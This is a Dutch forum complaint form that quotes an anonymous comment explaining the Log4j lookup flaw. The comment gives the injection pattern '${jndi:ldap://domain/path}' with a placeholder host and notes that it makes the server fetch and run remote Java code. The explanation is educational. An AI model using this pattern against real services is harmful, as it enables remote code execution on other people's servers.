Je hebt een klacht over de onderstaande posting:
Door Anoniem: Dat je een kwetsbare versie draait hoeft niet te betekenen dat je kwetsbaar bent. Je kunt natuurlijk ook de specifieke kwetsbare onderdelen niet gebruiken. Het is hier de aanvaller die besluit of het gebruikt wordt. Het gaat hier om een "feature" van Log4j om in gelogde berichten de notatie "${...}" te vervangen door een tekst die volgens de specificatie tussen de accolades wordt geproduceerd. Bijvoorbeeld "${java:version}" levert de Java-versie op waaronder log4j draait. Maar ook "${jndi"<lookup>}" en "${jndi:ldap://domain/path}" werden default ondersteund, en daarmee kan java-code van externe servers wordt opgehaald en die wordt dan doodleuk uitgevoerd. De aanvaller hoeft maar in invoer die gelogd wordt die notatie op te geven en hij kan eigen code injecteren in een applicatieserver. Onder het motto: Als je overdag fiets mag je lamp best kapot zijn. Dit is geen goede analogie. Het gaat niet om iets dat het moet doen dat het nu even niet doet; het gaat om iets dat het juist wél doet terwijl ...
Beschrijf je klacht (Optioneel):